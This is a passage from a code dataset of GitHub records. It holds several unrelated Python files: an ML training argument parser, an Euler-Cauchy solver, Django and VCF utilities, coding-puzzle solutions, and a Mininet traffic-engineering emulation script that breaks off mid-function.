\"variables: 'all', 'pos', 'vel', 'acc', 'rot' 'omega'.\")\n parser.add_argument(\"-sen\", \"--state_estimate_name\", type=str,\n help=\"The (file) name for state estimate measurements for the DDA architecture.\")\n parser.add_argument(\"-sev\", \"--state_estimate_variables\", type=str, nargs=\"+\",\n help=\"The column names/state variables to use for the state estimates for the DDA \"\n \"architecture. Can also specify the following shorthands for pre-defined sets of \"\n \"variables: 'all', 'pos', 'vel', 'acc', 'rot' 'omega'.\")\n parser.add_argument(\"-seda\", \"--state_estimate_data_augmentation\", action=\"store_true\",\n help=\"Whether or not to apply data augmentation to the provided state estimates for the\"\n \"DDA architecture (in the form of adding Gaussian noise to the state variables).\")\n\n # arguments related to the model\n parser.add_argument(\"-m\", \"--model_name\", type=str,\n choices=[\"codevilla\", \"c3d\", \"c3d_state\", \"codevilla300\", \"codevilla_skip\",\n \"codevilla_multi_head\", \"codevilla_dual_branch\", \"codevilla_no_state\", \"resnet_state\",\n \"resnet\", \"resnet_larger\", \"resnet_larger_dual_branch\", \"resnet_larger_multi_head\",\n \"resnet_state_larger\", \"resnet_larger_att_ctrl\", \"state_only\", \"dreyeve_branch\",\n \"resnet_att\", \"resnet_larger_gru\", \"ue4sim\", \"dda\", \"high_res_att\", \"simple_att\",\n \"resnet_gaze\", \"resnet_larger_gaze\", \"direct_supervision\"],\n help=\"The name of the model to use.\")\n parser.add_argument(\"-mlp\", \"--model_load_path\", type=str, # TODO: maybe adjust for dreyeve net\n help=\"Path to load a model checkpoint from (including information about the \"\n \"architecture, the current weights and the state of the optimiser).\")\n parser.add_argument(\"-nca\", \"--no_control_activation\", action=\"store_true\",\n help=\"Whether or not to use an activation function for the output of the control \"\n \"prediction network (currently using sigmoid for thrust and tanh for body rates).\")\n parser.add_argument(\"-ga\", \"--gaze_activation\", action=\"store_true\",\n help=\"Whether or not to use an activation function (tanh) \"\n \"for the output of the gaze prediction networks.\")\n parser.add_argument(\"-csf\", \"--channel_scale_factor\", type=int,\n help=\"Factor by which to scale the number of channels for the high-resolution attention model.\")\n parser.add_argument(\"-hra\", \"--high_res_activation\", action=\"store_true\",\n help=\"Whether or not to activate the attention output of the \"\n \"High-Res-Attention network (using hard tanh).\")\n\n # arguments related to training\n parser.add_argument(\"-md\", \"--mode\", type=str, choices=[\"train\", \"cv\", \"val\", \"test\"],\n help=\"Mode to train in, currently only 'normal' training and cross validation.\")\n parser.add_argument(\"-g\", \"--gpu\", type=int,\n help=\"GPU to use for training if any are available.\")\n parser.add_argument(\"-ts\", \"--torch_seed\", type=int,\n help=\"Random seed to use for calling torch.manual_seed(seed).\")\n parser.add_argument(\"-w\", \"--num_workers\", type=int,\n help=\"Number of workers to use for loading the data.\")\n parser.add_argument(\"-b\", \"--batch_size\", type=int,\n help=\"Batch size to use for training.\")\n parser.add_argument(\"-e\", \"--num_epochs\", type=int,\n help=\"Maximum number of epochs to train for.\")\n parser.add_argument(\"-o\", \"--optimiser\", type=str, choices=[\"adam\"],\n help=\"The optimiser to use.\")\n parser.add_argument(\"-lr\", \"--learning_rate\", type=float,\n help=\"The learning rate to start with.\")\n parser.add_argument(\"-l\", \"--losses\", type=str, nargs=\"+\",\n help=\"The loss to use. Depends on the model architecture and what kinds of outputs \"\n \"(and how many) it has. For now only one loss can be specified (no architecture \"\n \"with multiple outputs/losses). If the wrong loss is supplied, it will be changed \"\n \"automatically to the default loss for a given architecture/output type.\")\n\n # arguments related to logging information\n parser.add_argument(\"-lg\", \"--log_root\", type=str,\n help=\"Root directory where log folders for each run should be created.\")\n parser.add_argument(\"-exp\", \"--experiment_name\", type=str,\n help=\"The name under which to save the logs and checkpoints (in addition to a timestamp).\")\n parser.add_argument(\"-vf\", \"--validation_frequency\", type=int,\n help=\"How often to compute the validation loss during each epoch. When set to 1 \"\n \"(the default value) this is only done at the end of the epoch, as is standard.\")\n parser.add_argument(\"-cf\", \"--checkpoint_frequency\", type=int,\n help=\"Frequency at which to save model checkpoints (in epochs).\")\n\n # parse the arguments\n arguments = parser.parse_args()\n\n # train\n main(parse_config(arguments))\n","repo_name":"uzh-rpg/VAPAR","sub_path":"gazesim/gazesim/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15018481060","text":"from Euler import euler_method\r\nimport math\r\n\r\n\r\ndef euler_caushy(function=None, y0=None, a_b=None, n=None):\r\n if function is None or y0 is None or a_b is None or n is None:\r\n euler = euler_method()\r\n function = euler[0]\r\n table_euler = euler[1]\r\n else:\r\n table_euler = euler_method(function, y0, a_b, n)[1]\r\n\r\n a = table_euler[0][1]\r\n b = table_euler[-1][1]\r\n n = len(table_euler) - 1\r\n h = (b - a) / n\r\n\r\n yzuv = table_euler[0][2:]\r\n yzuv = list(yzuv)\r\n x0 = a\r\n\r\n answer_list = [(0, x0, *yzuv)]\r\n g = len(yzuv)\r\n while len(yzuv) < 4:\r\n yzuv.append(None)\r\n\r\n f1, f2, f3, f4 = [None] * 4\r\n f = [f1, f2, f3, f4]\r\n new_f1, new_f2, new_f3, new_f4 = [None] * 4\r\n new_f = [new_f1, new_f2, new_f3, new_f4]\r\n yi, zi, ui, vi = [None] * 4\r\n k = [yi, zi, ui, vi]\r\n\r\n for i in range(1, n+1):\r\n x, y, z, u, v = x0, *yzuv\r\n\r\n for j in range(g):\r\n f[j] = eval(function[j])\r\n\r\n new_yzuv = yzuv\r\n new_yzuv[0:g] = table_euler[i][2:]\r\n x, y, z, u, v = x0+h, *new_yzuv\r\n for j in range(g):\r\n new_f[j] = eval(function[j])\r\n\r\n for j in range(g):\r\n k[j] = yzuv[j] + (h/2) * (f[j] + new_f[j])\r\n yzuv[j] = k[j]\r\n\r\n x0 += h\r\n answer_list.append((i, x0, *k[0:g]))\r\n\r\n return answer_list\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(euler_caushy())\r\n\r\n","repo_name":"SMALA-comand/Differential_equations","sub_path":"Euler_Caushy.py","file_name":"Euler_Caushy.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"71189276946","text":"from . import errors, crud\n\n\ndef get_variant_list(query_params):\n data = crud.get_vcf_data()\n if query_params.ID:\n data = data.query(f'ID == \"{query_params.ID}\"')\n prev_page = query_params.page - 1\n cur_page = query_params.page\n result = []\n values = data.values\n if len(values) > prev_page*10:\n for i in range(prev_page*10, cur_page*10):\n if i > len(values) - 1:\n break\n result.append({\n \"CHROM\": values[i][0].strip(),\n \"POS\": values[i][1],\n \"ID\": values[i][2].strip(),\n \"REF\": values[i][3].strip(),\n \"ALT\": values[i][4].strip(),\n })\n if not result:\n raise errors.JsonException(\n message=errors.NO_VARIANTS_FOUND, code=404)\n return result\n\n\ndef create_variant(variant):\n data = crud.get_vcf_data()\n record = crud.create_record(variant)\n data = data.append(record, ignore_index=True)\n crud.save_data(data)\n\n\ndef edit_variant(ID, variant):\n data = crud.get_vcf_data()\n if not len(data.loc[data['ID'] == ID]):\n raise errors.JsonException(\n message=errors.NO_VARIANTS_FOUND, code=404)\n cols = [\"CHROM\", \"POS\", \"ID\", \"REF\", \"ALT\"]\n variant_dict = variant.dict()\n for i in range(5):\n data.loc[data['ID'] == ID, data.columns[i]] = variant_dict[cols[i]]\n crud.save_data(data)\n\n\ndef delete_variant(ID):\n data = crud.get_vcf_data()\n if not len(data.loc[data['ID'] == ID]):\n raise errors.JsonException(\n message=errors.NO_VARIANTS_FOUND, code=404)\n data.drop(list(data.loc[data['ID'] == ID].index), axis=0, inplace=True)\n crud.save_data(data)\n","repo_name":"ETsagkaris/saphetorProject","sub_path":"backend/app/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8018127140","text":"#!/bin/python3\n\nif __name__ == \"__main__\":\n # Compute the 3 x 3 determinant of the system\n # Determinant = 0, when system of equations has *NO SOLUTIONS*\n det = lambda a: a*(2*a - 1) - 1*(a - 2) + 2*(1 - 4)\n \n # Hold all possible alpha values\n lst = list()\n \n # Loop through several values that make det = 0\n for i in range(-100, 101):\n if det(i) == 0:\n lst += [i]\n \n # Return the minimum value\n print(min(lst))\n","repo_name":"Chukwudebelu/HackerRank","sub_path":"Mathematics/Linear_Algebra_Foundations/Linear_Algebra_Foundations_#8-Systems_of_Equations/Foundations8SystemsOfEquations1.py","file_name":"Foundations8SystemsOfEquations1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"72549651345","text":"from django.contrib import admin\nfrom .models import TelegramCommands, CommandStatistics, BotAnswers\nfrom django.db.models import Count\n\n\n@admin.register(TelegramCommands)\nclass TelegramCommandsAdmin(admin.ModelAdmin):\n list_display = (\n 'username', 'message', 'date', 'chat'\n )\n readonly_fields = ('username',)\n list_display_links = ('message',)\n search_fields = ('username', 'message')\n list_filter = ('username', 'chat')\n empty_value_display = '-пусто-'\n\n\n@admin.register(CommandStatistics)\nclass CommandStatisticsAdmin(admin.ModelAdmin):\n list_display = ('command_name', 'call_count')\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def get_queryset(self, request):\n unique_commands = TelegramCommands.objects.values(\n 'message'\n ).annotate(\n count=Count('username')\n ).order_by('-count')\n\n for command in unique_commands:\n command_name = command['message']\n call_count = command['count']\n command_stat, created = CommandStatistics.objects.get_or_create(\n command_name=command_name,\n defaults={'call_count': call_count}\n )\n if not created:\n command_stat.call_count = call_count\n command_stat.save()\n\n return CommandStatistics.objects.all()\n\n\n@admin.register(BotAnswers)\nclass BotAnswersAdmin(admin.ModelAdmin):\n list_display = (\n 'username', 'response', 'date'\n )\n readonly_fields = ('username',)\n search_fields = ('username',)\n list_filter = ('username',)\n empty_value_display = '-пусто-'\n","repo_name":"avnosov3/NewsWeatherFeed","sub_path":"dashboard/web/telegram/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12464842399","text":"import json\n\nfrom django.core.management import BaseCommand\nfrom recipes.models import Ingredient\n\n\nclass Command(BaseCommand):\n help = 'Загрузка ингредиентов в БД'\n\n def handle(self, *args, **options):\n with open(\n './data/ingredients.json',\n encoding='utf-8'\n ) as data:\n for row in json.load(data):\n ingredient = Ingredient(\n name=row['name'].capitalize(),\n measurement_unit=row['measurement_unit']\n )\n ingredient.save()\n","repo_name":"Andrey11995/foodgram-project-react","sub_path":"backend/recipes/management/commands/load_ingredients.py","file_name":"load_ingredients.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73600697106","text":"import logging\n\nfrom treestump.formatter import TreestumpFormatter\n\n\nclass TreestumpLogger:\n def __init__(self, app_name: str, event_log_formatter_cls=None):\n \"\"\"\n Creates the TreestumpLogger instance, using a custom formatter. The default is `TreestumpFormatter`. Any argument that overrides this default must be a subclass of `TreestumpFormatter`. If it is not, `TreestumpFormatter` will be used instead.\n\n @param app_name: The name of the application where the logger is being used\n @type app_name: str\n @debug_mode: (Optional) Defaults to False\n @type debug_mode: bool\n @param event_log_formatter_cls: (Optional) Log formatter for the class. Defaults to `TreestumpFormatter`. Any custom formatters should inherit from `TreestumpFormatter`.\n \"\"\"\n self.app_name = app_name\n if event_log_formatter_cls:\n try:\n assert issubclass(event_log_formatter_cls, TreestumpFormatter)\n self._event_log_formatter_cls = event_log_formatter_cls\n except AssertionError:\n self.event_log_formatter_cls = TreestumpFormatter\n else:\n self.event_log_formatter_cls = TreestumpFormatter\n\n self._logger = self._configure_logger()\n\n def __repr__(self):\n return f\"TreestumpLogger for application '{self.app_name}'\"\n\n def log(self, message: str, level=20, *args, **kwargs):\n \"\"\"\n @param message: The human-readable message to log\n @type message: str\n @param args: Additional arguments to pass to the logger\n @type args: list\n @param kwargs: Additional keyword arguments to pass to the logger\n @type kwargs: dict\n \"\"\"\n # If no level is specified, log at 20: INFO\n self._logger.log(level, message, *args, **kwargs)\n\n def _configure_logger(self):\n \"\"\"\n Configures the Python logger. This retreives or creates a specially-named logger where the handler is an instance of `logging.StreamHandler` and the formatter is an instance of `TreestumpFormatter`\n\n @return: The configured Python logger\n @rtype: logging.Logger\n \"\"\"\n # Create (or retrieve) a logger named by our template and app_name\n logger = logging.getLogger(f\"{self.app_name}_event_logger\")\n\n # Set log level threshold\n logger.setLevel(logging.INFO)\n\n # Create a new logging.StreamHandler() and set our defined formatter on the handler\n handler = logging.StreamHandler()\n handler.setFormatter(self.event_log_formatter_cls(self.app_name))\n logger.addHandler(handler)\n\n return logger\n","repo_name":"thejessleigh/treestump","sub_path":"treestump/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"44010079802","text":"# 只出现一次的数字:除了一个��字出现一次,其他都出现了三次,找出这个数\n\n# 对于出现三次的数字,各二进制位出现的次数都是3的倍数,对3求余,结果为只出现一次的数字\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n counts = [0] * 32\n for num in nums:\n for j in range(32):\n # 获取二进制最后一位\n counts[j] += num & 1\n # 右移,循环获取num所有位的值\n num >>= 1\n res, m = 0, 3\n # 将counts数组中各二进制位的值恢复到数字res上\n for i in range(32):\n res <<= 1\n res |= counts[31 - i] % m\n # 对于负数要特殊操作\n return res if counts[31] % m == 0 else ~(res ^ 0xffffffff)","repo_name":"wxmsummer/algorithm","sub_path":"leetcode/offer/offer56-3_singleNumbers.py","file_name":"offer56-3_singleNumbers.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4086095102","text":"import csv\n\nfrom django.core.management import BaseCommand\n\nfrom recipes.models import Ingredient\n\n\nclass Command(BaseCommand):\n \"\"\"\n Наполнение базы данных данными из ingredients.csv.\n Команда - pyhton manage.py fill_db.\n \"\"\"\n def handle(self, *args, **options):\n\n file_path = 'data/ingredients.csv'\n print('Загрузка началась')\n\n with open(file_path, 'r', encoding='utf-8') as csv_file:\n ingredients = csv.reader(csv_file)\n\n for row in ingredients:\n name, measurement_unit = row\n Ingredient.objects.get_or_create(\n name=name,\n measurement_unit=measurement_unit\n )\n\n print('Загрузка успешно завершена')\n","repo_name":"AndrewNemz/foodgram-project-react","sub_path":"backend/recipes/management/commands/fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27125772800","text":"#!/usr/bin/python\n\n\"\"\" Emulation framework entry script that initiates and runs a TE swap-over\nperformance test on a topology with a sepecific controller.\n\nUsage:\n sudo ./EmulateTE.py --topo --controller --scenario \\\n --sw_ctrl_map [map] --ctrl_options [ctrl_opts] \\\n --config_file [config_file]\n\n - Topology module to use for the emulation\n - Name of the controller to use. See 'controllers_te.yaml' for\n list of supported names. Note, start command of YMAL file is ignored\n - Path to scenario YAML file that defines experiment behaivour\n [map] - Swith-controller map. Using this attribute will initiate multiple\n controllers and instances (as per the map details).\n [ctrl_opts] - Netem attributes to apply to the controll channel to modify\n characterstics of switch-to-controller communication.\n [log_level] - Optional emulator logging level (debug, info, warning,\n error, critical). Defaults to critical.\n [ctrl_log_level] - Optional controller logging level (debug, info, warning,\n error, critical). Defaults to critical.\n [config_file] - Optional configuration file to use for emulator. Specifies\n start command and other config attributes. Defaults to\n \"EmulatorConfigs/config.TE.yaml\".\n\"\"\"\n\nimport os\nimport time\nimport subprocess\nimport shutil\nimport importlib\nimport traceback\nfrom argparse import ArgumentParser\n\n# Mininet imports\nfrom mininet.log import setLogLevel, info, lg\n\n# Config file loading and switch state check\nimport json\nimport yaml\nfrom tools.StateMatches import StateWaitTimeoutException, wait_match\n\n# Shared method imports\nfrom emulator_base import load_ctrls, get_ctrl_names, get_ctrl_module\nfrom emulator_base import path_to_import_notation\nfrom emulator_base import signal_subprocess\nfrom emulator_base import prepare_check_dict\nfrom emulator_base import ControllerManager\nfrom emulator_base import running_instance_check\n\n\n# Dictionary that contains information about avaible controllers.\n# XXX NOTE: The 'start_command' attribute is used to find the module for the\n# required controller. We assume that the module is located as the second item\n# in the list (index 1). All other attributes of the command are ignored!\nCONTROLLERS = {}\n\n# Template for the iperf stream script used to generate traffic for the experiment\nIPERF_GEN_SCRIPT_TMPL = \"\"\"#!/bin/bash\n\nsleep %s;\niperf -c %s -u -b %s -t %s;\necho 'DONE' > %s.done\n\"\"\"\n\n# Template used to generate gnuplot script to make graphs for viewing results\nGNUPLOT_SCRIPT_TMPL = \"\"\"set datafile separator ','\nset autoscale\nunset log\nset xtic 5\nset ytic 5\nset title 'Congestion Minimisation Performance'\nset xlabel 'Time (seconds)'\nset ylabel 'Packet Loss (%%)'\nset term png\nset output '%s'\nset bmargin %s\nset key box below\n\nset grid ytics lc rgb '#bbbbbb' lw 1 lt 0\nset grid xtics lc rgb '#bbbbbb' lw 1 lt 0\n\nplot \\\\\n\"\"\"\n\nGNUPLOT_SERIES_TMPL = \"\"\" '%s' using %s title '%s' with linespoints\"\"\"\n\n# Dictionary that defines the TE optimisation test scenario that needs to be\n# emulated (i.e. host send rates and times)\nSCENARIO = {}\n\"\"\" Format:\n{\"scenario_name\": , \"usable_on_topo\": [, ...], \"scenario\": {\n : {\n \"send\": [\n {\n \"src_host\": , \"dest_addr\": ,\n \"rate\": , \"delay\": \n },\n ...\n ],\n \"receive\": [{\"host\": }, ...]\n }, ...}\n}\n\n represents the name of the controller the scenario applies to while the\n'send' attribute defines the ammount of traffic () a host () is\nsending to a destination receiver (). The 'receive' list defines all\nthe hosts that will act as iperf servers (receives).\n\"\"\"\n\n# Running topology module information\ntopo = None\n# Controller manager instance\ncontrollers = None\n# Running network instance\nnet = None\n\ndef load_scenario(file):\n \"\"\" Load the TE emulation scenario from a YAML file `file` and return it.\n\n Args:\n file (str): Path to TE scenario YAML file.\n\n Returns:\n dict: TE scenario information dictionary\n \"\"\"\n with open(file, \"r\") as stream:\n return yaml.safe_load(stream)\n\ndef validate_scenario(scen, ctrl, topo):\n \"\"\" Validate a TE scenario `scen` from the controller `ctrl`. Ensure that\n the scenario specifies valid sender and recivers as defined by the topology\n `topo`.\n\n Note:\n This method will modify the scenario by over-writing the top-level\n dictionary of controllers (key 'scenario') with the controller we\n are using for emulation `ctrl`.\n\n Args:\n scen (dict): TE scenario information dictionary\n ctrl (str): Name of controller to validate scenario info for\n topo (obj): Topology module to use for validation\n\n Raises:\n Exception: Scenario file is invalid\n \"\"\"\n # Make sure the controller exists in the scenario file\n if ctrl not in scen[\"scenario\"]:\n raise Exception(\"Invalid scenario. Controller %s not found!\" % ctrl)\n\n # Remove redundant controller scenario info\n scen[\"scenario\"] = scen[\"scenario\"][ctrl]\n scen = scen[\"scenario\"]\n\n # Check if the stream time exists in the config\n if \"stream_time\" not in scen:\n raise Exception(\"Invalid scenario: Scenario has no stream time field\")\n else:\n if int(scen[\"stream_time\"]) <= 0:\n raise Exception(\"Invalid scenario: Stream time not positive int\")\n\n # Check that the attributes are correct\n for s in scen[\"send\"]:\n if (\"src_host\" not in s or \"dest_addr\" not in s or \"rate\" not in s\n or \"delay\" not in s):\n raise Exception(\"Invalid scenario: Send info has missing fields\")\n if s[\"delay\"] < 0:\n raise Exception(\"Invalid scenario: Send delay not positive float\")\n stream_time = scen[\"stream_time\"]\n if stream_time < s[\"delay\"]:\n raise Exception(\"Invalid scenario: Send delay > stream time\")\n if not s[\"src_host\"] in topo.hosts():\n raise Exception(\"Invalid scenario: Send host dosen't exist\")\n\n for r in scen[\"receive\"]:\n if \"host\" not in r:\n raise Exception(\"Invalid scenari:. Receive info has missing fields\")\n if not r[\"host\"] in topo.hosts():\n raise Exception(\"Invalid scenario. Receive host dosen't exist\")\n\ndef cleanup():\n \"\"\" Clean used resources by terminating running network, controller or host\n process instances. Method should be called on an error or when the emulation\n has finished.\n \"\"\"\n global net\n global controllers\n\n # Tell the controller manager to stop any running instances\n if controllers is not None:\n controllers.stop()\n controllers = None\n\n if net is not None:\n # Stop the LLDP packet generators\n for h in topo.hosts_attr(net):\n host = net.get(h[0])\n signal_subprocess(host, \"LLDP/lldp_host.py\", kill=True)\n\n # Stop the iperf traffic generators and receivers\n for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n s = SCENARIO[\"scenario\"][\"send\"][i]\n host = net.get(s[\"src_host\"])\n info(\"Stopped iperf stream script on host %s\\n\" % s[\"src_host\"])\n signal_subprocess(host, \"bash st%s.sh\" % i, kill=True)\n\n for i in range(len(SCENARIO[\"scenario\"][\"receive\"])):\n r = SCENARIO[\"scenario\"][\"receive\"][i]\n host = net.get(r[\"host\"])\n info(\"Stopped iperf server on host %s\\n\" % r[\"host\"])\n signal_subprocess(host, \"iperf -s\", kill=True)\n\n # Stop the network\n net.stop()\n net = None\n\ndef run(controller_name):\n \"\"\" Start and run the emulation experiment to record TE swap-over\n performance by looking at sustained congestion/loss rates when links are\n constrained and sufficient traffic is placed on them to generate congestion\n loss. This emulation test uses iperf sender and receivers to generate\n traffic on the topology. All sustained congestion intervals are printed to\n standard output on single lines with format ',,'\n were represents the iperf stream ID, the start time (in\n seconds) when congestion was first observed and the end time (in\n seconds) when congestion loss stopped (loss % reached 0). In addition to the\n numeric results, graphs of congestion loss % vs time are saved in files\n named 'graph_.png' were represents the index number\n of the iperf server (receiver) from the scenario file.\n\n If an error occurs, a single line is printed to standard output in format\n 'ERROR!,'. Extra information such as stack traces, task lists and\n flow/group table dumps are outputed using the mininet logger (written to\n error out) with a critical logging level.\n\n Note:\n Similar to 'EmulateLinkFailure.py', the tests waits for the switches to\n be in a specific state before starting the experiment. The expected\n state is defined in a the 'WaitState' directory by a JSON file with the\n name '..json'.\n\n Args:\n controller_name (str): Name of controller to use\n \"\"\"\n # Create the stream iperf scripts to run and clear the done indicator\n # files of the scripts\n for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n s = SCENARIO[\"scenario\"][\"send\"][i]\n t = s[\"delay\"] + 1\n end_t = SCENARIO[\"scenario\"][\"stream_time\"] - s[\"delay\"]\n fname = \"st%s\" % i\n with open(\"%s.sh\" % fname, \"w\") as f:\n f.write(IPERF_GEN_SCRIPT_TMPL % (t, s[\"dest_addr\"], s[\"rate\"], end_t, fname))\n\n open(\"%s.done\" % fname, \"w\").close()\n\n # Tell the hosts to start generating LLDP packets\n time.sleep(1)\n for h in topo.hosts_attr(net):\n host = net.get(h[0])\n host.cmd(\"LLDP/lldp_host.py %s %s &\" % (h[1], h[2]))\n\n # Wait for the switches to start-up with the correct state\n try:\n check_dict = {}\n with open(\"WaitState/%s.%s.json\" % (controller_name, topo.name), \"r\") as data_file:\n check_dict = json.load(data_file)\n prepare_check_dict(check_dict)\n wait_match(check_dict, timeout=30)\n except StateWaitTimeoutException:\n # If we time out write an error message, dump the flows and clean-up\n print(\"ERROR!,Network state took too long to stabilise, exiting ...\")\n ls.critical(\"%s\\n\" % subprocess.check_output([\"ps\", \"-aux\"]))\n\n # Dump the flow rules (and groups if not reactive controller)\n topo.dump_tables(dump_groups=False if controller_name == \"reactive\" else True)\n\n # Cleanup and exit\n cleanup()\n return\n\n info(\"Topology has stabilised, running iperf test\\n\")\n\n for i in range(len(SCENARIO[\"scenario\"][\"receive\"])):\n r = SCENARIO[\"scenario\"][\"receive\"][i]\n info(\"RECV %s %s\\n\" % (i, r[\"host\"]))\n host = net.get(r[\"host\"])\n host.cmd(\"iperf -s -u -i 1 > TE_OUT_%s.txt &\" % i)\n\n for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n s = SCENARIO[\"scenario\"][\"send\"][i]\n info(\"SEND %s %s\\n\" % (i, s[\"src_host\"]))\n fname = \"st%s.sh\" % i\n host = net.get(s[\"src_host\"])\n host.cmd(\"bash %s &\" % fname)\n\n # Wait for the iperf stream senders to finish sending data\n stream_done = []\n for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n stream_done.append(False)\n\n timed_out = True\n for wait in range(1, 120):\n bool_all_done = True\n for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n if stream_done[i] == False:\n bool_all_done = False\n with open(\"st%s.done\" % i, \"r\") as f:\n if f.readline().rstrip() == \"DONE\":\n stream_done[i] = True\n\n if bool_all_done:\n timed_out = False\n break\n\n time.sleep(1)\n\n if timed_out:\n critical(\"Iperf Stream did not terminate in time\\n\")\n\n info(\"Finished iperf, cleaning up and computing results\\n\")\n\n # Cleanup, process results and remove temp and generated files\n cleanup()\n for i in range(len(SCENARIO[\"scenario\"][\"receive\"])):\n try:\n proc_iperf_data(i)\n os.remove(\"TE_OUT_%s.txt\" % i)\n except Exception as ex:\n lg.critical(\"Error processing iperf data of receiver %s: %s\\n\"\n % (i, ex))\n continue\n\n for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n os.remove(\"st%s.sh\" % i)\n os.remove(\"st%s.done\" % i)\n\ndef proc_iperf_out(line):\n \"\"\" Process a iperf server line interval output. Method returns a\n packed tuple of the fields in a a iperf -s line when the inveral is\n set to 1. If the line is not a interval entry, Null is returned.\n\n Args:\n line (str): Line to extract fields from\n Returns:\n packed tuple: time_left, time_right, size,rate, delay, loss or None if\n `line` is not a valid interval line.\n \"\"\"\n time_left = None\n time_right = None\n size = None\n rate = None\n delay = None\n loss = None\n\n line_unproc = line.lower()\n if \"sec\" in line_unproc:\n line_unproc = line_unproc.split(\" sec\")\n\n time = line_unproc[0]\n line_unproc = line_unproc[1].strip()\n\n time_left = float(time.split(\"-\")[0].strip())\n time_right = float(time.split(\"-\")[1].strip())\n else:\n return None\n\n if \"bytes\" in line_unproc:\n line_unproc = line_unproc.split(\"bytes\")\n\n size = line_unproc[0]+\"Bytes\"\n line_unproc = line_unproc[1].strip()\n else:\n return None\n\n if \"bits/sec\" in line_unproc:\n line_unproc = line_unproc.split(\"bits/sec\")\n\n rate = line_unproc[0] + \"bits/sec\"\n line_unproc = line_unproc[1].strip()\n else:\n return None\n\n if \"ms\" in line_unproc:\n line_unproc = line_unproc.split(\"ms\")\n delay = line_unproc[0] + \"ms\"\n line_unproc = line_unproc[1].strip()\n else:\n return None\n\n if \"%\" in line_unproc:\n line_unproc = line_unproc.split(\"(\")\n loss = line_unproc[1].split(\")\")[0]\n else:\n return None\n\n if (time_right - time_left) > 1:\n # Skip the total line\n return None\n\n return (time_left, time_right, size, rate, delay, loss)\n\ndef proc_iperf_data(server_index):\n \"\"\" Process through the iperf server output to generate the TE recovery\n time graph. Method will iterate through 'TE_OUT.txt' created by the iperf\n server and create a gnuplot file which is then used to make the graph\n for this execution in file 'graph.png'.\n \"\"\"\n stream_id = []\n stream_data = {}\n\n # Split the iperf server file by streams\n with open(\"TE_OUT_%s.txt\" % server_index) as f:\n for line in f.readlines():\n line = line.strip()\n if line.startswith(\"[\"):\n if \"]\" not in line:\n continue\n\n ID = line.split(\"]\")\n data = ID[1].strip()\n ID = ID[0][1:].strip()\n if ID.isdigit() == False:\n continue\n\n if ID not in stream_id:\n stream_id.append(ID)\n if ID not in stream_data:\n stream_data[ID] = []\n\n stream_data[ID].append(data)\n\n # Consolidate the streams into one line of data and work out start and end of congestion\n stream_congestion = {}\n for ID in stream_id:\n stream_congestion[ID] = {\"start\": None, \"end\": None}\n\n proc_data = {}\n index = 0\n for ID in stream_id:\n ST_START_DELAY = SCENARIO[\"scenario\"][\"send\"][index][\"delay\"]\n index += 1\n for line in stream_data[ID]:\n res = proc_iperf_out(line)\n if res is not None:\n tmp = \"%s\" % \",\".join(map(str, res[2:]))\n tup = (res[0]+ST_START_DELAY, res[1]+ST_START_DELAY)\n if tup not in proc_data:\n proc_data[tup] = {}\n\n proc_data[tup][ID] = tmp\n\n # Try to find the start and the end of the congestion\n if stream_congestion[ID][\"start\"] is None and float(res[5][:-1]) > 1:\n stream_congestion[ID][\"start\"] = res[0]+ST_START_DELAY\n elif (stream_congestion[ID][\"start\"] is not None and\n stream_congestion[ID][\"end\"] is None and\n float(res[5][:-1]) < 1):\n stream_congestion[ID][\"end\"] = res[0]+ST_START_DELAY\n\n # Output data that needs to be plotted by gnuplot\n with open(\"out_%s.dat\" % server_index, \"w\") as f:\n for key in sorted(proc_data.keys()):\n dat = proc_data[key]\n f.write(\"%s,%s,\" % (key[0], key[1]))\n skipped = False\n for ID in stream_id:\n if skipped:\n f.write(\",\")\n else:\n skipped = True\n\n if ID in dat:\n f.write(dat[ID])\n else:\n f.write(\"0,0,0,0\")\n\n f.write(\"\\n\")\n\n # Generate the gnuplot script used to make the graphs\n num_series = len(SCENARIO[\"scenario\"][\"send\"])\n margin = 5\n if num_series > 3:\n margin += 1\n\n with open(\"out_%s.p\" % server_index, \"w\") as f:\n out_file = \"graph_%s.png\" % server_index\n data_fname = \"out_%s.dat\" % server_index\n f.write(GNUPLOT_SCRIPT_TMPL % (out_file, margin))\n\n for i in range(num_series):\n series = \"1:%s\" % (6+4*i)\n series_name = \"Stream %s\" % (i+1)\n f.write(GNUPLOT_SERIES_TMPL % (data_fname, series, series_name))\n\n if not i == (num_series - 1):\n f.write(\", \\\\\\n\")\n else:\n f.write(\"\\n\")\n\n # Create graph of data and print detected congestion start and end times for each stream\n cmd = \"gnuplot out_%s.p\" % server_index\n 